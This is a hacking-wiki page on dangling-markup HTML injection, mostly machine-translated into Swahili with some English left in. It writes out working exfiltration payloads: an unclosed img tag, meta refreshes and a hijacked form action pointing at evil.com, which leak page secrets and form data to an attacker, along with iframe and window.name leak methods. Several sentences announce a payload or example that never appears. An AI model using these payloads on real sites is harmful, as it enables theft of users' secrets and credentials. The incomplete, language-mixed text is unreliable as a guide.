Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Teknolojia hii inaweza kutumika kutoa taarifa kutoka kwa mtumiaji wakati **HTML injection inapatikana**. Hii ni muhimu sana ikiwa **hupati njia yoyote ya kutumia** [**XSS** ](../xss-cross-site-scripting/)lakini unaweza **kuiingiza baadhi ya vitambulisho vya HTML**.\
Pia ni muhimu ikiwa **siri fulani imehifadhiwa kwa maandiko wazi** katika HTML na unataka **kuipatia** kutoka kwa mteja, au ikiwa unataka kupotosha utekelezaji wa script fulani.
Mbinu kadhaa zilizozungumziwa hapa zinaweza kutumika kupita baadhi ya [**Content Security Policy**](../content-security-policy-csp-bypass/) kwa kupeleka taarifa kwa njia zisizotarajiwa (vitambulisho vya html, CSS, vitambulisho vya http-meta, fomu, msingi...).
Ikiwa unaiingiza `<img src='http://evil.com/log.cgi?` wakati ukurasa umepakuliwa, mwathirika atakutumia msimbo wote kati ya vitambulisho vya `img` vilivyoingizwa na nukuu inayofuata ndani ya msimbo. Ikiwa siri fulani iko katika kipande hicho, utaiba hiyo (unaweza kufanya jambo hilo hilo kwa kutumia nukuu mbili, angalia ni ipi inaweza kuwa ya kuvutia zaidi kutumia).
Ikiwa vitambulisho vya `img` vinakatazwa (kwa sababu ya CSP kwa mfano) unaweza pia kutumia `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
You could also insert a `<base` tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):
Weka kichwa cha fomu: `<form action='http://evil.com/log_steal'>` hii itabadilisha kichwa cha fomu inayofuata na data zote kutoka kwa fomu zitatumwa kwa mshambuliaji.
Pata [**mfano wa shambulio hili katika andiko hili**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp).
na hii sehemu ya kuingiza itakuwa na maudhui yote kati ya nukta zake mbili na nukta inayofuata katika HTML. Shambulio hili linachanganya "_**Kuharibu siri za maandiko wazi**_" na "_**Kuharibu fomu2**_".
`<noscript></noscript>` Ni lebo ambayo maudhui yake yatafasiriwa ikiwa kivinjari hakisaidii javascript (unaweza kuwasha/kuzima Javascript katika Chrome kwenye [chrome://settings/content/javascript](chrome://settings/content/javascript)).
Kutoka kwenye [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) unaweza kujifunza kwamba hata kutoka kwenye mazingira **yanayozuia CSP zaidi** bado unaweza **kuhamasisha data** kwa kutumia **maingiliano ya mtumiaji**. Katika tukio hili tutatumia payload:
Note that you will ask the **victim** to **click on a link** that will **redirect** him to **payload** controlled by you. Also note that the **`target`** attribute inside the **`base`** tag will contain **HTML content** until the next single quote.\
This will make that the **value** of **`window.name`** if the link is clicked is going to be all that **HTML content**. Therefore, as you **control the page** where the victim is accessing by clicking the link, you can access that **`window.name`** and **exfiltrate** that data:
Weka tag mpya na id ndani ya HTML ambayo itabadilisha ile inayofuata na thamani ambayo itakuwa na athari kwenye mtiririko wa script. Katika mfano huu unachagua na nani taarifa itashirikiwa:
Hati ya mtoto ina uwezo wa kuona na kubadilisha mali ya `location` ya mzazi wake, hata katika hali za cross-origin. Hii inaruhusu kuingiza script ndani ya **iframe** ambayo inaweza kuelekeza mteja kwenye ukurasa wowote:
Iframe pia inaweza kutumika vibaya kuvuja taarifa nyeti kutoka ukurasa tofauti **kwa kutumia sifa ya iframe name**. Hii ni kwa sababu unaweza kuunda iframe ambayo inajifunga yenyewe ikitumia uingizaji wa HTML ambao unafanya **taarifa nyeti kuonekana ndani ya sifa ya iframe name** na kisha kufikia jina hilo kutoka iframe ya awali na kuvuja.
Kwa maelezo zaidi angalia [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
Unaweza kutumia **`meta http-equiv`** kufanya **vitendo kadhaa** kama kuweka Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` au kufanya uelekeo (katika sekunde 5 katika kesi hii): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
Hii inaweza **kuepukwa** kwa **CSP** kuhusu **http-equiv** ( `Content-Security-Policy: default-src 'self';`, au `Content-Security-Policy: http-equiv 'self';`)
Unaweza kupata **utafiti wa kuvutia sana** kuhusu udhaifu unaoweza kutumika wa tag \<portal [hapa](https://research.securitum.com/security-analysis-of-portal-element/).\
Wakati wa kuandika hii unahitaji kuwezesha tag portal kwenye Chrome katika `chrome://flags/#enable-portals` au haitafanya kazi.
Sio njia zote za kuvuja muunganisho katika HTML zitakuwa na manufaa kwa Dangling Markup, lakini wakati mwingine zinaweza kusaidia. Angalia hapa: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
Hii ni **mchanganyiko** kati ya **dangling markup na XS-Leaks**. Kutoka upande mmoja, udhaifu unaruhusu **kuingiza HTML** (lakini si JS) katika ukurasa wa **asili moja** ya ile tutakayoshambulia. Kutoka upande mwingine hatutashambulia moja kwa moja ukurasa ambapo tunaweza kuingiza HTML, bali **ukurasa mwingine**.
XS-Search zimeelekezwa kwenye **kuondoa taarifa za cross-origin** kwa kutumia **shambulio la upande**. Hivyo, ni mbinu tofauti na Dangling Markup, hata hivyo, baadhi ya mbinu zinatumia ujumuishaji wa vitambulisho vya HTML (pamoja na bila utekelezaji wa JS), kama [**CSS Injection**](../xs-search/#css-injection) au [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
